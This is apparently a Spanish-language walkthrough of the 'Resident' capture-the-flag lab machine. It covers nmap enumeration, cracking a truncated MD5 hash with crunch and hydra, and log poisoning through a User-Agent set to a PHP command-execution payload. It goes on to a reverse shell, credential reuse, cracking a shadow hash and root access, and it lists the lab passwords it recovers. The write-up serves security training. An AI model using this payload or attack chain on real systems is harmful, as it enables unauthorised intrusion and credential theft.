Resident
| Sistema operativo | Dificultad | Fecha de Lanzamiento | Creador |
|---|---|---|---|
| Linux | Avanzado | 09 Octubre 2024 | rodgar |
Enumeración inicial
Realizamos un escaneo con nmap para descubrir que puertos TCP se encuentran abiertos en la máquina víctima.
nmap -sS -p- --open --min-rate 5000 -Pn -n -vvv 192.168.1.16 -oG open_ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-09 09:29 -03
Initiating ARP Ping Scan at 09:29
Scanning 192.168.1.16 [1 port]
Completed ARP Ping Scan at 09:29, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:29
Scanning 192.168.1.16 [65535 ports]
Discovered open port 22/tcp on 192.168.1.16
Discovered open port 80/tcp on 192.168.1.16
Completed SYN Stealth Scan at 09:29, 2.23s elapsed (65535 total ports)
Nmap scan report for 192.168.1.16
Host is up, received arp-response (0.00024s latency).
Scanned at 2024-10-09 09:29:19 -03 for 3s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:A2:02:58 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Lanzamos una serie de script básicos de enumeración propios de nmap, para conocer la versión y servicio que esta corriendo bajo los puertos.
nmap -sCV -p 22,80 -oN services_scan 192.168.1.16 -vvv
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-09 09:30 -03
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
Initiating ARP Ping Scan at 09:30
Scanning 192.168.1.16 [1 port]
Completed ARP Ping Scan at 09:30, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:30
Completed Parallel DNS resolution of 1 host. at 09:30, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 09:30
Scanning 192.168.1.16 (192.168.1.16) [2 ports]
Discovered open port 22/tcp on 192.168.1.16
Discovered open port 80/tcp on 192.168.1.16
Completed SYN Stealth Scan at 09:30, 0.01s elapsed (2 total ports)
Initiating Service scan at 09:30
Scanning 2 services on 192.168.1.16 (192.168.1.16)
Completed Service scan at 09:30, 6.06s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.16.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.35s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
Nmap scan report for 192.168.1.16 (192.168.1.16)
Host is up, received arp-response (0.00093s latency).
Scanned at 2024-10-09 09:30:43 -03 for 6s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 e8:fc:cb:53:f8:97:01:69:27:3c:58:0c:48:b7:28:eb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG57NJgjMDvZrMojGo/exr2ABYNJCphm+fCZWJtQ9JPzJXV80sls23mRqVhtuNfF7dlckuPUVutpp14I+rPybW0=
| 256 fa:87:ab:ce:92:42:86:71:55:00:b1:35:96:93:1f:f4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGmMtRfmRHsCpbNpV+TCAlOjrevjvj2KrOsB6S4vMh+0
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Iniciar Sesi\xC3\xB3n
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
MAC Address: 08:00:27:A2:02:58 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.71 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
Explotación inicial
Accedemos a Cyberchef e identificamos el hash, el cual esta códificado en base64 y luego aplicamos un URL Decode.
El resultado es un hash, pero para ser MD5 le falta un caracter.
Utilizamos crunch para realizar las combinatorias necesarias y generar los posibles hash.
crunch 32 32 abcdef0123456789 -t 5a06153b12b2ec6210a8bb66f4e78c4 -o hashes.txt
Utilizamos hydra para realizar fuerza bruta y romper el hash.
admin:5a06153b12b2ec6210a8bb66f4e78c4a
Log Poisoning
Interceptamos la petición con burpsuite y lo que haremos es cambiar el user agent por <?php system($_GET['cmd']);?>.
POC
Lanzamos una reverse shell.
Realizamos un tratamiento de la TTY.
Leemos el flag de user.txt
Enumeración / Movimiento lateral
www-data -> simple
Credenciales de la base de datos.
simple:simple
Intentamos usando las mismas credenciales por la reutilización de credenciales y es correcta la suposición.
Elevación de privilegios
Si miramos dentro del directorio /home, encontramos un script el cual copia el archivo password.txt desde el home del usuario ram al directorio tmp. Otorgamos permisos de ejecución al bianario y lo ejecutamos.
Si miramos dentro del archivo copiado, nos encontramos con lo siguiente:
ram:$y$j9T$v3fiA7W1LOJmdyVZGUfIp0$TF7qqhsJ1SnWH8caDijOlxCjIo2VXgurTgq6DIlxmE1:20003:0:99999:7:::
Rompemos el hash con jonh y obtenemos la contraseña.
Ingresamos las credenciales y ya somos ram.
ram:fuckyou
Vamos a nuestra carpeta donde podemos observar 3 archivos y en root.txt tenemos un password.
Probamos ese password como de root y estamos en lo correcto. De esta manera culminando esta máquina.
Usuario: root:macbookpro
Leemos el flag de root.txt
